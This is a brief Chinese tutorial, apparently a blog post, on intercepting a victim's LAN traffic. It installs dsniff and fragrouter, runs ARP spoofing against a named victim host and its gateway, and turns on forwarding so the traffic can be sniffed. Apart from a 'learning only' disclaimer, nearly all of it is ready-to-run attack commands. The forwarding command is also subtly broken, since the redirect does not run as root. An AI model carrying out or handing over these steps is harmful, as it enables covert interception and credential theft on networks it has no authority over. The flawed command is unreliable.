本文仅用于学习研究，请勿用于非法用途

假设系统为 Ubuntu 9.10，网络情况如下：

• 路由 IP：172.16.86.254
• 我的电脑 IP：172.16.86.2
• 受害者 IP：172.16.86.3

主要使用的工具有两个，一个是 Dsniff，另一个是 fragrouter。

一、安装 Dsniff

使用以下命令安装 Dsniff：

sudo apt-get install dsniff

二、安装 fragrouter

首先，在 /etc/apt/sources.list 文件中添加源：

deb http://cz.archive.ubuntu.com/ubuntu hardy main universe

然后执行以下命令进行安装：

sudo apt-get install fragrouter

三、ARP 欺骗

欺骗受害者

欺骗 172.16.86.3，让它认为网关 172.16.86.254 的 MAC 地址是本机的 MAC 地址，使用以下命令：

sudo arpspoof -t 172.16.86.3 172.16.86.254 

欺骗网关

欺骗网关，让它认为 172.16.86.3 的 MAC 地址是本机的 MAC 地址，使用以下命令：

sudo arpspoof -t 172.16.86.254 172.16.86.3 

当 ARP 数据包广播之后，网关和受害机之间的数据通信将都经过我的机器。

设置转发

设置转发，使受害机与网关的通信正常：

sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo fragrouter -B1

接下来，就可以开始嗅探数据啦。如果还不会使用 Dsniff，可以在网上搜索相关资料，或者改用 WireShark 这个 GUI 工具进行抓包。